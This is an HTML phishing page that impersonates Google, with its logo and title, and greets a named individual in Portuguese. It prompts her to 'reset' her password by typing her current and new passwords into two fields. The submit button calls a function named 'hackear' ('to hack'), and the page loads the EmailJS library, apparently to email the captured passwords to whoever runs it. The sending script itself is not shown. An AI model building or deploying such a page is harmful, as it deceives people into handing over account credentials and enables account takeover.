<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Google</title>
  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
  <style>
  
    body {
      font-family: Arial, Helvetica, sans-serif;
      padding: 20px;
    }
    
    h1 {
      font-weight: normal;
    }
    
    img {
      width: 64px;
      height: 64px;
    }
    
    p {
      font-size: 20px;
    }
    
    input {
      display: block;
      padding: 15px;
      border-radius: 5px;
      border: 1px solid black;
      font-size: 16px;
      width: 90%;
      margin-bottom: 10px;
    }
    
    button {
      background-color: blue;
      color: white;
      padding: 10px;
      font-weight: bold;
      border: none;
      border-radius: 15px;
      font-size: 15px;
      width: 100%;
      text-align: center;
    }
    
  </style>
</head>
<body>
  <img src="google.png" alt="Google">
  <h1>Olá, Fabriane!</h1>
  <p>Redefina sua senha</p>
  <input type="text" id="senha" placeholder="Senha atual">
  <input type="text" id="senhaat" placeholder="Nova senha">
  <button onclick="hackear()">Redefinir</button>
  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
  <script src="script.js"></script>
</body>
</html>